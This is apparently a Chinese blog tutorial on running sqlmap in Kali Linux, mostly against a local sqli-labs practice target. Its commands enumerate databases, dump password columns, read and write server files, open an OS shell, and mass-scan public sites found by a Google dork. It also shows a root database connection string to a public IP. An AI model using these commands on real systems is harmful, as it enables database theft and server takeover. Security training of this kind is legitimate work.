kali linux下sqlmap使用教程

已于 2022-04-08 11:08:04 修改
阅读量1.9w 收藏 173
点赞数 23
文章标签: web安全 安全 系统安全
于 2022-03-30 12:26:56 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-NC-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_52084568/article/details/123839776
版权

SQLMAP

有windows和linux两个版本使用,可跨系统进行操作,语法参数都相同,此处以kali linux为例进行操作

sqlmap --version
查看sqlmap版本
sqlmap -h
查看sqlmap帮助
sqlmap -hh
查看sqlmap高级帮助

在这里插入图片描述
在这里插入图片描述

使用sqlmap连接数据库
查看数据库banner信息
sqlmap -d "mysql://root:123456@47.208.229.216:3306/tiantianbao" -f --banner
查看数据库用户
sqlmap -d "mysql://root:123456@47.208.229.216:3306/tiantianbao" -f --banner --users

在这里插入图片描述
在这里插入图片描述

针对URL进行探测,使用-u或者-url参数
查看目标url连接数据库的banner信息
sqlmap -u "192.168.137.129/sqli-labs/Less-1/index.php/?id=1" --banner

在这里插入图片描述

sqlmap读取文件内目标
Sqlmap支持从不同类型的文件中读取目标进行Sql注入探测
1、-l从Burpsuite proxy或WebScarab proxy中读取Http 请求日志文件
sqlmap -l test(bp导出文件)
2、-x 从sitemap.xml站点地图文件中读取目标探测。
3、-m从多行文本格式文件读取多个目标,对多个目标进行探测。
sqlmap -m test.txt(自写的url)
4、-r从文本文件中读取Http请求作为Sql注入探测的目标。
sqlmap -r test.txt(bp导出请求的数据文件)
5、-C从配置文件sqlmap.conf中读取目标探测。

sqlmap google批量扫描注入
利用google hack语法进行扫描
sqlmap -g "inurl:\.php?id=1\""

sqlmap设置http请求方法
强制指定
--method=get
设置post提交参数
sqlmap -u '192.168.137.129/sqli-labs/Less-11/index.php' --data="uname=admin&passwd=admin&submit=Submit" -f --banner --dbs --users -f --fingerprint

在这里插入图片描述

sqlmap设置参数分隔符
get		;
post	& 

sqlmap设置cookie头
--cookie
--cookie-del
--load-cookies
--drop-sel-cookie
用于Web应用程序具有基于cookie的验证过程
利用cookie注入的漏洞

1.GET参数注入

sqlmap -u "http:/192.168.3.2/sqli-labs-master/sqli-labs-master/Less-1/?id=1"

2.POST参数注入

sqlmap -u "http:/192.168.3.2/sqli-labs-master/sqli-labs-master/Less-1"  --data="id=1"

3.cookie注入 (level>=2时才会检测cookie)  

sqlmap -u "http:/192.168.3.2/sqli-labs-master/sqli-labs-master/Less-1/?id=1" --level 2

4.user-agent注入

sqlmap -u "http:/192.168.3.2/sqli-labs-master/sqli-labs-master/Less-1/?id=1" --level 3

5.referer注入

sqlmap -u "http:/192.168.3.2/sqli-labs-master/sqli-labs-master/Less-1/?id=1" --level 3

6.host注入

sqlmap -u "http:/192.168.3.2/sqli-labs-master/sqli-labs-master/Less-1/?id=1" --level 5

获取数据库信息

1.查看数据库

sqlmap -u "http:/192.168.3.2/sqli-labs-master/sqli-labs-master/Less-1/?id=1" --dbs  --batch

2.查看数据库里面的表

sqlmap -u "http:/192.168.3.2/sqli-labs-master/sqli-labs-master/Less-1/?id=1" --D security --tables --batch

3.查看数据库表里面的列

sqlmap -u "http:/192.168.3.2/sqli-labs-master/sqli-labs-master/Less-1/?id=1" --D security --T users --columns   --batch

4.查看数据库列里面的具体的值

sqlmap -u "http:/192.168.3.2/sqli-labs-master/sqli-labs-master/Less-1/?id=1" --D security --T users -C password     --dump  --batch

暴力破解

使用条件:

1.MySQL数据库版本小于5.0,没有information——schema表。

2.Microssoft Access数据库。

3.当前用户没有权限读取系统中保存的数据。

*暴力破解中破解表名的文件位于common-tables.txt 中,同理破解列名的文件位于common-columns.txt 中

1.暴力破解表名

sqlmap -u "http:/192.168.3.2/sqli-labs-master/sqli-labs-master/Less-1/?id=1"  -D security --common-tables --batch



2.暴力破解列名

sqlmap -u "http:/192.168.3.2/sqli-labs-master/sqli-labs-master/Less-1/?id=1"  -D security -Tusers --common-columns --batch



读取文件/上传文件
1.读取文件

sqlmap -u "http:/192.168.3.2/sqli-labs-master/sqli-labs-master/Less-1/?id=1"   --file-read "C:/post.txt"



2写入文件

sqlmap -u "http:/192.168.3.2/sqli-labs-master/sqli-labs-master/Less-1/?id=1"   --file-write "/root/1.txt"

 --file-dest "C:/phpstudy/PHPTutorial/www/1.txt"

获取shell

sqlmap -u "http:/192.168.3.2/sqli-labs-master/sqli-labs-master/Less-1/?id=1"  --os-shell
kali工具使用sqlmap教程
J546283791的博客
10-25 456
首先kali自带sqlmap:尝试一下sqlilab第一关:结果:尝试查询数据库:出现:尝试查询security下的所有表:结果:尝试查users下的所有字段:结果尝试爆破各字段所有条目:
kali——sqlmap使用
bunengyongzho666的博客
08-29 2890
sqlmap是一款强大的开源自动化SQL注入工具,主要用于检测和利用SQL注入漏洞,协助渗透测试人员快速发现和验证web应用程序中的SQL注入缺陷。实际渗透测试中,只要kali机能够上网就可以直接使用sqlmap;这里我们在centos上搭建sqlibs靶场做靶机,kali机为攻击机。然后将kali机的dns为服务机centos的dns,这样kali机就可以访问centos上的网站了。
kali linux更新sqlmap
最新发布
ztc131450的博客
03-11 1185
在网络安全领域中,Kali Linux是一个备受关注的操作系统,它专门用于渗透测试和数字取证。而在渗透测试工具中,SQLMap是一个非常常用且强大的工具,它专门用于检测和利用SQL注入漏洞。因此,当Kali Linux更新SQLMap时,无疑会引起很多网络安全从业者的关注。SQL注入是一种常见的网络攻击方式,黑客可以通过在Web应用程序的用户界面中插入恶意的SQL查询来访问和修改后端数据库。而SQLMap是一个自动化工具,可以帮助渗透测试人员快速而准确地检测和利用这些漏洞。
kali工具sqlmap使用教程
qq_52805176的博客
07-13 4453
渗透测试工具sqlmap的简单使用
kali-sqlMap使用技巧
HKkkkkSky的博客
09-20 865
SQL 注入是一种代码渗透技术,是最常用的网络黑客技术之一。SQL 注入非常危险,可能会导致数据库中的数据被暴露,甚至被损坏。
kali中的sqlmap使用
yishuihanwyf的博客
12-01 1290
kalisqlmap中的简单使用
kali工具SQLmap基本使用方法流程以及命令解析
FRANXX_02的博客
10-06 6693
kali工具SQLmap基本使用方法流程以及命令解析
如何在kali Linux使用sqlmap工具
gaomei2009的专栏
06-20 2039
post请求中参数为 uname=admin*&passwd=test&submit=Submit。第一步:先判定kali Linuxsqlmap能够正常使用。在kali linux中,使用sqlmap,如上图。先遍历出数据库类型和所有的表。第二步:抓取某个页面的登陆数据包,如下。指定数据库表名sql10051008。
kali linuxsqlmap注入ACCESS数据库.doc
03-04
下面我们将详细介绍如何使用 Kali Linux 下的 SQLmap 注入 ACCESS 数据库。 数据库安全 在介绍 SQLmap 之前,我们首先需要了解数据库安全的重要性。数据库是存储和管理数据的核心组件,而数据库安全则是保护数据库...
sqlmap 使用笔记(kali环境)
qq_40691438的博客
02-10 2394
sqlmap默认把session文件跟结果文件保存在output文件夹下,用此参数可自定义输出路径 例如:–当请求是HTTPS的时候,需要配合–force-ssl参数来使用,或者可以在Host头后面加上:443。在有些时候web服务器使用了伪静态,导致无法直接使用sqlmap测试参数,可以在想测试的参数后面加*用–os-shell参数也可以模拟一个真实的shell,可以输入你想执行的命令。输出的格式可定义为:CSV,HTML,SQLITE。参数:–os-cmd,–os-shell。文件内容直接copy。
kali基于sqlmap使用
ztK63LrD的博客
04-27 9110
kaliSQLmap
SQLmap使用教程图文教程(超详细)
热门推荐
wangyuxiang946的博客
06-20 6万+
SQLmap是一款自动化SQL注入工具,kali自带。路径 /usr/share/sqlmap 一、目标 1、指定url 2、指定文件(批量检测) 3、指定数据库/表/字段 4、post请求 5、cookie注入 二、脱库 1、获取数据库 2、获取表 3、获取字段 4、获取字段类型 5、获取值(数据) 6、获取用户 7、获取主机名 8、搜索库、表、字段。 9、正在执行的SQL语句 三、WAF绕过
kali sqlmap使用方法
2401_85233504的博客
09-15 478
2.Cookie注入sqlmap -u "http://www.example.com/index.php" --cookie="PHPSESSID=123456" --batch。1.POST请求注入sqlmap -u "http://www.example.com/login.php" --data="username=admin&password=123456" --batch。
sqlmapkali中的应用及ctfhub实战
2301_77004573的博客
07-08 1443
工具一把嗦固然方便,但仍不能忽视对原理的理解,毕竟常有sqlmap跑不出来的题目,为了检验自己对sql注入的掌握情况,之后也会补一篇手工注入的文章。
kali sqlmap使用笔记
N1ce_peter的blog
05-16 1198
kali sqlmap使用笔记一、-u 判断数据库类型二、获取目标所有数据库。功能快捷键合理的创建标题,有助于目录的生成如何改变文本的样式插入链接与图片如何插入一段漂亮的代码片生成一个适合你的列表创建一个表格设定内容居中、居左、居右SmartyPants创建一个自定义列表如何创建一个注脚注释也是必不可少的KaTeX数学公式新的甘特图功能,丰富你的文章UML 图表FLowchart流程图导出与导入导出导入 参考资料 https://www.cnblogs.com/aeolian/p/11021796.html
kali linuxsqlmap
weixin_30410999的博客
03-02 522
一款开源的命令行自动SQL注入工具,它能够对多种主流数据库进行扫描支持,基于Python环境。 检测动态页面中get/post参数,cookie,http头 数据榨取/文件系统访问 操作系统命令执行 引擎强大,特性丰富 xss检测 支持主流的数据库 五种漏洞检测技术: 基于布尔的盲注检测 基于时间的盲注检测( 'and (select(sleep(20)))a)-- ...
Kali Linux渗透测试 093 自动注入-Sqlmap
kevinhanser
09-17 8296
本文记录 Kali Linux 2018.1 学习使用和渗透测试的详细过程,教程安全牛课堂里的《Kali Linux 渗透测试》课程 1. Sqlmap 简介 2. Target 3. Requests 4.Optization(优化) 5. injection 6. detection 7. techniques 8. fingerprint(指纹
kali linux里利用SQLmap实现SQL注入
2201_76034619的博客
06-28 6538
安全等级调为low进入SQL Injection(Blind)页面。
sqlmap 入门级使用
梦落红尘
06-21 3万+
虽然我用过mssql和oracle,但表示只是用过,不是很熟,所以本文大多数都在说MySQL数据库。 一、数据库 数据库管理系统  ->  数据库(可能存在多个) ->   表(一般一个数据库中都存储多个表) -> 字段  (一般一个表中都有多个字段) 也就是说:一般都是一对多的关系,这里就不深究了,我们先来看看表(tables)的结构。    这是从phpmyadmin中截取的
kali sqlmap使用教程
08-24
以下是使用Kali Linuxsqlmap的一些基本操作: 1. 首先,你可以使用命令`sqlmap --version`来查看sqlmap的版本号。 2. 如果你需要查看sqlmap的帮助信息,可以使用命令`sqlmap -h`。这将显示基本的帮助信息,包括命令选项和参数的说明。 3. 如果你需要查看更详细的高级帮助信息,你可以使用命令`sqlmap -hh`。这将显示更多的选项和参数以及其用法的详细说明。 4. 如果你想对向后台查询的GET请求进行注入测试,你可以使用命令`sqlmap -u "http://172.16.107.243/pikachu/vul/sqli/sqli_str.php?name=admin&submit=查询"`。这将对指定的URL进行注入测试,并尝试发现任何可能的SQL注入漏洞。 5. 如果你想列出数据库名称,你可以使用命令`sqlmap -u "http://172.16.107.243/pikachu/vul/sqli/sqli_str.php?name=admin&submit=查询" -dbs`。这将列出找到的所有数据库名称。 请注意,使用sqlmap进行SQL注入测试时要格外小心,确保你有合法的授权和权限,并且只在你有合法访问权限的系统上进行测试。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* [kali linuxsqlmap使用教程](https://blog.csdn.net/weixin_52084568/article/details/123839776)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 50%"] - *2* *3* [kali工具SQLmap基本使用方法流程以及命令解析](https://blog.csdn.net/FRANXX_02/article/details/127180052)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 50%"] [ .reference_list ]
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

暴龙振翅飞翔

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值